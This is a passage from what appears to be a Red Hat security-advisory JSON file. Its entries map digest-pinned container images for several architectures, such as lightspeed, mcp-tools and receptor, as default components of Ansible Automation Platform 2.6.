"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64 as a component of Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
